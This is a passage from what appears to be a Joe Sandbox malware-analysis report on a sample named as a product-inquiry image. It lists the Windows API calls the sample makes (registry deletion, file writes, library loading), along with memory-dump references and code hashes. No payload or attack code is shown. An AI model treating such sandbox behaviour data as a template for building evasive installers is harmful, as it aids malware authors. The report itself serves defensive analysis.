                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
                                                                        • Instruction ID: 7386925216f0ba2205b30ed829fcd6135741b8aa1a9a6a78a8dcdd66e79b8f9a
                                                                        • Opcode Fuzzy Hash: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
                                                                        • Instruction Fuzzy Hash: 1001F431724220EBEB194B389D09B2A3698E710318F10867FF855F66F1E678CC169B5D
                                                                        APIs
                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteValue
                                                                        • String ID:
                                                                        • API String ID: 2831762973-0
                                                                        • Opcode ID: 33a2a408210eafd8eb503bcbe8c5f8002623883fc626b53cac394db522f02307
                                                                        • Instruction ID: 7bf3b9bda095295facd6d55e439189fe3d0c4b39bd7c4db64debc0172d77640d
                                                                        • Opcode Fuzzy Hash: 33a2a408210eafd8eb503bcbe8c5f8002623883fc626b53cac394db522f02307
                                                                        • Instruction Fuzzy Hash: 91F09632A00120ABDB10AFA89B4DAAE73B5AF44314F12443FF651B71D1DAFC5D01563E
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00405526
                                                                          • Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                        • CoUninitialize.COMBASE(00000404,00000000), ref: 00405572
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeMessageSendUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2896919175-0
                                                                        • Opcode ID: fc63040b4a478ac2ab6d1649a7b90cddf110423f46346301a32b5f76a47a80a4
                                                                        • Instruction ID: b1ddeeb25ba2a19929e7f2dc44f7fc61fd81dae06891ad5aaf8f1c5fa63b9bde
                                                                        • Opcode Fuzzy Hash: fc63040b4a478ac2ab6d1649a7b90cddf110423f46346301a32b5f76a47a80a4
                                                                        • Instruction Fuzzy Hash: 8AF0F076600600EBD3215B64AC01B1673A2EF90348F59407AEF84A33F4C77648028B6E
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: e03509bbb5a97b63c50fbd95e672b5189e570c0e449203604c47be68a41529df
                                                                        • Instruction ID: 97b786059bb2d23d50747ff5f4ab461a12b6bf7948ca023dcdd123286d4674a9
                                                                        • Opcode Fuzzy Hash: e03509bbb5a97b63c50fbd95e672b5189e570c0e449203604c47be68a41529df
                                                                        • Instruction Fuzzy Hash: 13E04F36B10115ABCB14DFA8ED8086E73B6FB54310760487AE902B3290C675AC11CB68
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                          • Part of subcall function 00406760: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                          • Part of subcall function 00406760: wsprintfW.USER32 ref: 004067B2
                                                                          • Part of subcall function 00406760: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                        • Instruction ID: 7df567e52fbdf149b69dac354ceafd4fa41e0472f673109ceae729e6c8d6a9a9
                                                                        • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                        • Instruction Fuzzy Hash: 26E0863390421096E211A7709F88C7773A8AF89644307483EF946F2080EB38DC31A679
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                        • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                        • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                        • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405AB1,?,?,00000000,00405C87,?,?,?,?), ref: 00405EB1
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405EC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                        • Instruction ID: 60f8d920560889598159a3dbe09e4bd556728e0d1be390bcc4c147b032138fe0
                                                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                        • Instruction Fuzzy Hash: 11D0C9725045306BC2102728EE0889BBF65EB682717014A35F9A5A22B0CB304C538A98
                                                                        APIs
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403482,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405995
                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                        • Instruction ID: b8aeb4fbbaa0c149d17919ad16f2792b2b84c079cfd5907120def0498e2ab647
                                                                        • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                        • Instruction Fuzzy Hash: 6DC04CB1244501EED6105B209F08B1B7A90EB50791F1688396146E01A0DA3C8455D97E
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403444,00000000,00000000,0040329B,?,00000004,00000000,00000000,00000000), ref: 00405F68
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                        • Instruction ID: 9c26e1e14bdaa641b2cd1607f69676223ac96f38baf9ffa7ddee8aaf7cdc77b6
                                                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                        • Instruction Fuzzy Hash: 0DE0EC3221025EABDF10AEA59C04EEB7B6CEB053A0F004877FD25E7150D735E9219BA8
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,00403412,000000FF,00414EC0,00000000,00414EC0,00000000,?,00000004,00000000), ref: 00405F97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction ID: e9dec13cd64576ed05e9c77268ddc280887ed2a39adbcd5729fa6c11973cde1c
                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction Fuzzy Hash: B8E0EC7221065AABDF109E659C00BEB7B6CEB05360F004476FE65E3150E639E9219BA5
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062D6,?,00000000,?,?,: Completed,?), ref: 0040626C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                        • Instruction ID: bea724714cad9c1dc166f779914bff17c7130a41f5efdae6cf1778ebc3f0871c
                                                                        • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                        • Instruction Fuzzy Hash: AFD0123210020DFBDF116FA0ED01FAB772DAB08350F014426FE06A40A1D775D530A768
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                        • Instruction ID: 6a5b654620e47c205ef353ff56fd69433b0ebd381e98485a923522fb35466dbd
                                                                        • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                        • Instruction Fuzzy Hash: A8C09BB1740705BBEE218F519D4DF1777586750700F294479B755F60D0D674D850D61C
                                                                        APIs
